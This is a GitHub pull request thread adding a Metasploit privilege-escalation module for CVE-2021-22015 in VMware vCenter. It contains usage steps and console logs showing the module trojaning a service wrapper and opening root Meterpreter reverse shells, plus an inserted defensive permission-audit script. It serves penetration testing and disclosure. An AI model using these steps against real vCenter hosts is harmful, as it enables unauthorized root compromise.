
CVE-2021-22015 vCenter priv esc #17286

Merged (2 commits) Dec 5, 2022

Conversation

@h00die (Contributor) commented Nov 20, 2022

Fixes #16489

This PR adds a priv esc for users in the cis group to escalate to root on certain versions of vCenter. A service file /usr/lib/vmware-vmon/java-wrapper-vmon has improper permissions allowing cis group members to write to it. Upon host reboot or vmware-vmon service restart, a root shell is obtained.

Verification

  1. Start msfconsole
  2. Obtain a shell on vCenter for a user in the cis group. (I used su vsphere-client off an SSH session)
  3. Do: use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc
  4. Do: set session #
  5. Do: run
  6. Restart the host, or the service (systemctl restart vmware-vmon.service) with a user who has permission
  7. You should get a root shell.
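The weakness the module relies on is a permission check: the wrapper script is writable by members of the cis group, so anyone in that group can change what vmware-vmon runs as root. The audit script below is an added example, not code from this PR or from the Metasploit module; it expresses that check as a stand-alone Ruby function over stat data so an administrator can confirm whether a host is exposed and whether a fix took. The helper names (`writable_by_group?`, `audit_wrapper`), the constructed test modes, and the assumed corrected state (root-owned, mode 0755, no group or world write) are this example's own choices, not values taken from the PR.

```ruby
# Added example (not part of the Metasploit module or this PR): audit the
# permission weakness behind CVE-2021-22015. The decision is factored into a
# pure function over (mode, group) so it can be checked with constructed
# values without touching a live vCenter appliance.
require 'etc'

WRAPPER_PATH = '/usr/lib/vmware-vmon/java-wrapper-vmon'.freeze
CIS_GROUP    = 'cis'.freeze

# True when st_mode grants write to group or to others, i.e. someone other
# than the owner could modify the file. 0o022 masks the g+w and o+w bits.
def group_or_world_writable?(mode)
  (mode & 0o022) != 0
end

# Core decision: can a member of +target_group+ write to a file whose owning
# group is +group+ and whose st_mode is +mode+? World-write applies to
# everyone; group-write applies only when the groups match.
def writable_by_group?(mode:, group:, target_group:)
  return true if (mode & 0o002) != 0
  (mode & 0o020) != 0 && group == target_group
end

# Stat one path on the live host and summarize its posture. Returns a hash
# with :vulnerable set from writable_by_group?, or :status => :missing when
# the file does not exist (non-vCenter hosts, or a renamed wrapper).
def audit_wrapper(path = WRAPPER_PATH, target_group = CIS_GROUP)
  st = File.stat(path)
  group = begin
    Etc.getgrgid(st.gid).name
  rescue ArgumentError
    st.gid.to_s # gid with no /etc/group entry
  end
  {
    path: path,
    mode: format('%o', st.mode & 0o7777),
    group: group,
    vulnerable: writable_by_group?(mode: st.mode, group: group, target_group: target_group)
  }
rescue Errno::ENOENT
  { path: path, vulnerable: false, status: :missing }
end

if __FILE__ == $PROGRAM_NAME
  result = audit_wrapper
  puts result.inspect
  # Assumed hardened state for this example: root-owned, not group/world writable.
  puts "FIX: chown root:root #{WRAPPER_PATH} && chmod 0755 #{WRAPPER_PATH}" if result[:vulnerable]
end
```

Running the script on an appliance reports the live mode and group; re-running it after patching (or after the module's cleanup restores the original file) gives a quick before/after comparison alongside a hash of the file's contents.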

@h00die (Contributor, Author) commented Nov 20, 2022

@U1traVio1et since you uploaded the code on https://github.com/PenteraIO/vScalation-CVE-2021-22015 wanted to make sure the vuln discoverer was properly credited.

@U1traVio1et

> @U1traVio1et since you uploaded the code on https://github.com/PenteraIO/vScalation-CVE-2021-22015 wanted to make sure the vuln discoverer was properly credited.

love this, thanks!

'Yuval Lazar' # original PoC, analysis
],
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
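Review bot: the ARCH_X86 entry in the 'Arch' line is not supported by anything shown in this thread; the only appliance evidence is an x86_64 kernel from uname -a and x64 Meterpreter sessions, and an x86 shell payload running there only shows that a 32-bit ELF executes under compat on an x86_64 kernel, not that a 32-bit vCenter build exists. If the intent is "x86 payloads also work on the x64 appliance", state that in the module documentation next to the tested versions; otherwise 'Arch' => [ ARCH_X64 ] matches the targets actually verified here.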
Review comment by a Contributor:

VCenter has an x86 version?

@h00die (Contributor, Author) replied Dec 1, 2022:

no idea, but x86 payloads do run on the appliance:

msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

whoami
root
uname -a
Linux localhost.domain4.4.8 #1-photon SMP Fri Oct 21 20:13:51 UTC 2016 x86_64 GNU/Linux
vpxd -v
Traceback (most recent call last):
  File "/usr/sbin/cloudvm-ram-size", line 52, in <module>
    sys.path.append(os.environ['VMWARE_PYTHON_PATH'])
  File "/usr/lib/python2.7/UserDict.py", line 40, in __getitem__
    raise KeyError(key)
KeyError: 'VMWARE_PYTHON_PATH'
VMware VirtualCenter 6.5.0 build-7070488
^Z
Background session 1? [y/N]  y
msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > sessions -l
                               
Active sessions                
===============                
                               
  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell x86/linux               1.1.1.1:4444 -> 2.2.2.2:57524 (2.2.2.2)

@bwatters-r7 bwatters-r7 self-assigned this Dec 1, 2022
@bwatters-r7 (Contributor) commented:

[*] Sending stage (3045348 bytes) to 10.5.132.113
[*] Meterpreter session 3 opened (10.5.135.201:4568 -> 10.5.132.113:58500) at 2022-12-01 10:41:15 -0600

msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer     : photon-machine.moose
OS           : VMware Photon 1.0 (Linux 4.4.228-1.ph1)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: vsphere-client
meterpreter > background
[*] Backgrounding session 3...
msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > show options

Module options (exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  3                yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /usr/lib/vmware-vmon/java-wrapper-vmon is writable and owned by cis group
[+] Original /usr/lib/vmware-vmon/java-wrapper-vmon backed up to /home/tmoose/.msf4/loot/20221201104214_default_10.5.132.113_javawrappervmo_010174.txt
[*] Writing payload to /tmp/.lRZPRgdUfG
[*] Writing '/tmp/.lRZPRgdUfG' (250 bytes) ...
[*] Writing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon
[*] Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)
[-] vmware-vmon service needs to be restarted, or host rebooted to obtain shell.
[*] Waiting 1800 seconds for shell
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 10.5.132.113
[+] Deleted /tmp/.lRZPRgdUfG
[*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.132.113:55654) at 2022-12-01 10:44:35 -0600
[*] Replacing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon with original

meterpreter > sysinfo
Computer     : photon-machine.moose
OS           : VMware Photon 1.0 (Linux 4.4.228-1.ph1)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root

@bwatters-r7 (Contributor) commented:

I was going to do a quick land on this, but it appears to be trashing my vCenter server?

[image]

I am resetting to a known-good state I used before to test this, so I'm not sure what's happening. It will be next week before I take another look. I did not want you to think I'd flaked out, though.

@h00die (Contributor, Author) commented Dec 3, 2022

Is the cleanup working correctly? md5sum the file before and after?

@bwatters-r7 (Contributor) commented:

Because it is no longer after 5 on a Friday, it appears to work fine?

msf6 payload(linux/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : photon-machine.moose
OS           : VMware Photon 1.0 (Linux 4.4.228-1.ph1)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: vsphere-client
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(linux/x64/meterpreter/reverse_tcp) > use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > show options

Module options (exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > set verbose true
verbose => true
msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /usr/lib/vmware-vmon/java-wrapper-vmon is writable and owned by cis group
[+] Original /usr/lib/vmware-vmon/java-wrapper-vmon backed up to /home/tmoose/.msf4/loot/20221205085056_default_10.5.132.113_javawrappervmo_517372.txt
[*] Writing payload to /tmp/.YsHfTxSJ
[*] Writing '/tmp/.YsHfTxSJ' (250 bytes) ...
[*] Writing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon
[*] Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)
[-] vmware-vmon service needs to be restarted, or host rebooted to obtain shell.
[*] Waiting 1800 seconds for shell
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 10.5.132.113
[+] Deleted /tmp/.YsHfTxSJ
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.113:56462) at 2022-12-05 08:52:56 -0600
[*] Replacing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon with original

meterpreter > sysinfo
Computer     : photon-machine.moose
OS           : VMware Photon 1.0 (Linux 4.4.228-1.ph1)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

[image]

@bwatters-r7 (Contributor) commented:

Yeah; I cannot seem to re-create what was happening Friday. Today, I can even restart the service when Friday, I had to reboot.

The original problem was that the service restart failed and I tried to reboot to kick off the privileged session, so the file would not have been returned to the original state, yet.
I verified today that I can restart the service or simply reboot and in both cases, I get the expected privileged shell; no sign of Friday's gremlins.

@h00die (Contributor, Author) commented Dec 5, 2022

I'll also note that it's set to ManualRanking for these reasons

@bwatters-r7 bwatters-r7 merged commit 54cd055 into rapid7:master Dec 5, 2022
@bwatters-r7 (Contributor) commented:

Release Notes

This PR adds a priv esc for users in the cis group to escalate to root on certain versions of vCenter. A service file /usr/lib/vmware-vmon/java-wrapper-vmon has improper permissions allowing cis group members to write to it. Upon host reboot or vmware-vmon service restart, a root shell is obtained.

@h00die h00die deleted the cve_2021_22015 branch December 5, 2022 15:32
@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Dec 5, 2022
Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)
Development

Successfully merging this pull request may close these issues.

CVE-2021-22015 -> Local Privilege Escalation in VMware vCenter
5 participants